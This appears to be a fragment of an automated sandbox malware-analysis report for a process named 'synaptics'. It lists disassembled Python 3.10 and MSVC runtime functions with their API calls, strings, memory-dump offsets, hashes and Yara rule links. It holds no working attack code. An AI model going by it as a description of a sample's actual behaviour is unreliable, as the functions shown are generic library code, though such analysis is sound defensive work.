                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4c56e4c09962f0a78f6b23c12948f3a1c44cfbe7f017222d635ed77b2032cfb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CE1F2715093419BE700CF18C840FAABBE5AFC6308F48855DE8D987B51D736E52ACB93
                                                                                                                                                                                                      Function 6C5B9ED0 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 332COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,tXl,-000000FF,?,?,?,6C5BB8AB), ref: 6C5B9EE7
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,6C5BB8AB), ref: 6C5B9F1A
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,?,6C5BB8AB), ref: 6C5B9F4D
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,?,?,6C5BB8AB), ref: 6C5B9F80
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000000,?,?,?,6C5BB8AB), ref: 6C5B9FB9
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000000,?,?,?,?,6C5BB8AB), ref: 6C5B9FF2
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000000,?,?,?,?,?,6C5BB8AB), ref: 6C5BA02B
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000000,?,?,?,?,?,?,6C5BB8AB), ref: 6C5BA064
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,6C5BB8AB), ref: 6C5BA097
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,?,6C5BB8AB), ref: 6C5BA0CA
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,?,?,6C5BB8AB), ref: 6C5BA0FD
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000001), ref: 6C5BA146
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,6C5BB8AB), ref: 6C5BA179
                                                                                                                                                                                                        • Part of subcall function 6C491A40: _PyLong_New.PYTHON310(00000001,00000000,?,?,?,6C480883,00000400), ref: 6C491A96
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(FF5004C4), ref: 6C5BA1E0
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5BB8AB), ref: 6C5BA213
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5BB8AB), ref: 6C5BA242
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Long_$FromLong
                                                                                                                                                                                                      • String ID: tXl
                                                                                                                                                                                                      • API String ID: 169803750-1321286613
                                                                                                                                                                                                      • Opcode ID: b73db5854e8ec822e4cd7da33f80903b8ce51f6f04ea77161fed44aea03a073b
                                                                                                                                                                                                      • Instruction ID: 632ad846e6f141acd0879e184f648483ba574bd93c2a57fd2cd31cef0f264d47
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b73db5854e8ec822e4cd7da33f80903b8ce51f6f04ea77161fed44aea03a073b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDC193717027019BEB04CFB5DD90996BBE4AF05338B14433CD92A8BAA1D776ED46CB81
                                                                                                                                                                                                      Function 73A8CE0A Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 285COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8CEE6
                                                                                                                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 73A8CEF1
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8CF04
                                                                                                                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 73A8CFEC
                                                                                                                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 73A8D009
                                                                                                                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 73A8D026
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8D03B
                                                                                                                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 73A8D055
                                                                                                                                                                                                      • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000010,00000000,0000002C,00000000,0000007B,00000000,00000001,00000008), ref: 73A8D06D
                                                                                                                                                                                                      • __telemetry_main_return_trigger.VCRUNTIME140(00000000), ref: 73A8D095
                                                                                                                                                                                                      • swprintf.LIBCMT ref: 73A8D0C9
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8D11D
                                                                                                                                                                                                        • Part of subcall function 73A8910F: DName::DName.LIBVCRUNTIME ref: 73A89124
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$__telemetry_main_return_triggeratolswprintf
                                                                                                                                                                                                      • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
                                                                                                                                                                                                      • API String ID: 1551792257-2309034085
                                                                                                                                                                                                      • Opcode ID: b090401593327e031828e05d6e18b637da83d15c4248a1a14433d479692d6cfa
                                                                                                                                                                                                      • Instruction ID: c25c8fa6a1497103e01ea45f0b2373115cf03f840be24314916e0fd75aa542b1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b090401593327e031828e05d6e18b637da83d15c4248a1a14433d479692d6cfa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43A1427290030A9BEB07DBB4C697BFEF778EF05200F10412BD146A669CDB699A45CB51
                                                                                                                                                                                                      Function 73A8AE5E Relevance: 28.8, APIs: 19, Instructions: 339COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1186856153-0
                                                                                                                                                                                                      • Opcode ID: 828f42d70315ba031f0789366856cff9dc9c973721df8c2faf434a0c52c2fb75
                                                                                                                                                                                                      • Instruction ID: 444eaa806828ca4b0597bd06fb323ea793d9105b24fd0725b079db588f478844
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 828f42d70315ba031f0789366856cff9dc9c973721df8c2faf434a0c52c2fb75
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFC12172910308AFDB06DF94C992BEDBBB9AF08300F54415FE546AB2A8EF749945CB50
                                                                                                                                                                                                      Function 6C455DB0 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 219COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_NoMemory.PYTHON310 ref: 6C455E3F
                                                                                                                                                                                                      • PyErr_SetString.PYTHON310(Negative size passed to PyByteArray_FromStringAndSize), ref: 6C455E5B
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(a bytes-like object is required, not '%.100s',?), ref: 6C455F4B
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(can't concat %.100s to %.100s,?,?), ref: 6C455F6A
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet), ref: 6C45600D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Negative size passed to PyByteArray_FromStringAndSize, xrefs: 6C455E50
                                                                                                                                                                                                      • Out of memory and PyExc_MemoryError is not initialized yet, xrefs: 6C456003
                                                                                                                                                                                                      • a bytes-like object is required, not '%.100s', xrefs: 6C455F40
                                                                                                                                                                                                      • can't concat %.100s to %.100s, xrefs: 6C455F5F
                                                                                                                                                                                                      • _PyErr_NoMemory, xrefs: 6C456008
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ErrorFatalFuncMemoryString
                                                                                                                                                                                                      • String ID: Negative size passed to PyByteArray_FromStringAndSize$Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory$a bytes-like object is required, not '%.100s'$can't concat %.100s to %.100s
                                                                                                                                                                                                      • API String ID: 2607238689-3103426855
                                                                                                                                                                                                      • Opcode ID: 217fc1e75643e61b57cb4085dde8482df20cb5c018837874478fa146d9ba973d
                                                                                                                                                                                                      • Instruction ID: 612c6f0d53fd6a5dea2e82133708842a70b403c5e9fd2df5f2c5af26f5006c95
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 217fc1e75643e61b57cb4085dde8482df20cb5c018837874478fa146d9ba973d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9071B072605702DFD710CF69DC40E6AB3F4AF81329B544618F96887BA1E732E925CB91
                                                                                                                                                                                                      Function 6C47EF00 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 194COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_NormalizeException.PYTHON310(?,?,?,?), ref: 6C47EFA2
                                                                                                                                                                                                      • _PyObject_GetDictPtr.PYTHON310(?), ref: 6C47EFCD
                                                                                                                                                                                                      • PyErr_Restore.PYTHON310(?,?,?), ref: 6C47EFEC
                                                                                                                                                                                                      • PyException_SetTraceback.PYTHON310(?,?), ref: 6C47F004
                                                                                                                                                                                                      • PyUnicode_FromFormatV.PYTHON310(00000001,?), ref: 6C47F027
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(?,%U (%s: %S),00000000,?,00000001), ref: 6C47F077
                                                                                                                                                                                                      • PyErr_Fetch.PYTHON310(?,?,?), ref: 6C47F0B0
                                                                                                                                                                                                      • _PyErr_NormalizeException.PYTHON310(?,?,?,?,?,?,?), ref: 6C47F0C7
                                                                                                                                                                                                      • PyException_SetCause.PYTHON310(?,00000001,?,?,?,?,?,?,?), ref: 6C47F0D2
                                                                                                                                                                                                      • PyErr_Restore.PYTHON310(?,?,?,?,00000001,?,?,?,?,?,?,?), ref: 6C47F0E0
                                                                                                                                                                                                      • _PyErr_Restore.PYTHON310(?,?,00000001,?), ref: 6C47F0FF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Restore$ExceptionException_FormatNormalize$CauseDictFetchFromObject_TracebackUnicode_
                                                                                                                                                                                                      • String ID: %U (%s: %S)$@Btl$@Btl
                                                                                                                                                                                                      • API String ID: 3685687444-3696437066
                                                                                                                                                                                                      • Opcode ID: d82b5d8c69066759a481751d308de01746a8e3cdbf4ee860ab25402b8438d2e7
                                                                                                                                                                                                      • Instruction ID: 5014875a04a1a59255ec8affd6546320d6dce9860c7f9453d46ac436a9a583c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d82b5d8c69066759a481751d308de01746a8e3cdbf4ee860ab25402b8438d2e7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3616D71A01108EFDB10CFA8DC41EDA77B4EF04328F1446A8E51897B61D732EE56CBA1
                                                                                                                                                                                                      Function 6C4F3EB0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C4F3EC0
                                                                                                                                                                                                      • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C4F3ECB
                                                                                                                                                                                                      • _lseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000), ref: 6C4F3EEA
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(6C6F4644), ref: 6C4F3F01
                                                                                                                                                                                                      • PyImport_Import.PYTHON310(00000000), ref: 6C4F3F14
                                                                                                                                                                                                      • _PyObject_CallMethodId_SizeT.PYTHON310(00000000,6C74D90C,isisOOO,00000000,6C6EE194,000000FF,?,?,?,?), ref: 6C4F3F5C
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74D914), ref: 6C4F3F84
                                                                                                                                                                                                      • PyObject_GetAttr.PYTHON310(00000000,00000000), ref: 6C4F3F96
                                                                                                                                                                                                      • _Py_CheckFunctionResult.PYTHON310(?,00000000,00000000,00000000), ref: 6C4F4012
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,00000000,00000000,00000000,00000000), ref: 6C4F4024
                                                                                                                                                                                                      • PyErr_SetFromErrnoWithFilenameObjects.PYTHON310(00000000,00000000), ref: 6C4F4059
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get), ref: 6C4F406F
                                                                                                                                                                                                      • getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,PyThreadState_Get), ref: 6C4F4089
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromObject_$CallUnicode_$AttrCheckErr_ErrnoError_FatalFilenameFunctionImportImport_MakeMethodObjectsResultSizeStringTstateWith_fileno_lseekftellgetc
                                                                                                                                                                                                      • String ID: PyThreadState_Get$isisOOO
                                                                                                                                                                                                      • API String ID: 3749307730-1377150442
                                                                                                                                                                                                      • Opcode ID: 7d9f72e0dcb300bd1b1534c140e67e615c48d580aa50f7fbce6491951cbc6ccf
                                                                                                                                                                                                      • Instruction ID: 28e91185e281a3670c85dc4678f5ab605b64e91d979899605ae451f2b6273753
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d9f72e0dcb300bd1b1534c140e67e615c48d580aa50f7fbce6491951cbc6ccf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A15136716002006FE720DA65DD41FA637B49F81779F244228F8399BBE1EB25E917C7A2
                                                                                                                                                                                                      Function 6C5AEEE0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 142COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyImport_AddModuleObject.PYTHON310(00000000), ref: 6C5AEF1F
                                                                                                                                                                                                      • PyModule_GetDict.PYTHON310(00000000), ref: 6C5AEF47
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DictImport_ModuleModule_Object
                                                                                                                                                                                                      • String ID: .pyc$SourcelessFileLoader$__cached__$__file__$__main__
                                                                                                                                                                                                      • API String ID: 187217562-1322405306
                                                                                                                                                                                                      • Opcode ID: 11df8c986c9772af25021d70cec2c633346ca96d6fcf4153dac9e0169bae2137
                                                                                                                                                                                                      • Instruction ID: 08a59b94bdd2615948439448de1ebddaa87370088669d2706c7d96a94e7ea103
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11df8c986c9772af25021d70cec2c633346ca96d6fcf4153dac9e0169bae2137
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7141F475A0530257EB109AA29C42F9F36959F8133CF140738F9249ABD1EB75D90BC7E2
                                                                                                                                                                                                      Function 6C548C00 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C77B0DC,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C2C
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C48
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C77B0DC,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C61
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C77B0FC,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C79
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C77B0FC,?,?,?,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548C98
                                                                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548CA1
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C77B0FC,?,?,?,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548CAB
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C77B0FC,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548CC9
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(drop_gil,drop_gil: GIL is not locked,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548CDC
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(drop_gil,PyCOND_SIGNAL(gil->cond) failed,drop_gil,drop_gil: GIL is not locked,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548CEB
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(drop_gil,PyCOND_WAIT(gil->switch_cond) failed,drop_gil,PyCOND_SIGNAL(gil->cond) failed,drop_gil,drop_gil: GIL is not locked,?,?,?,6C77B0C0,?,6C4F33E1,?), ref: 6C548CFA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterErrorFatalFuncLeave$ObjectReleaseSemaphoreSingleWait
                                                                                                                                                                                                      • String ID: PyCOND_SIGNAL(gil->cond) failed$PyCOND_WAIT(gil->switch_cond) failed$drop_gil$drop_gil: GIL is not locked
                                                                                                                                                                                                      • API String ID: 3334808725-1934138666
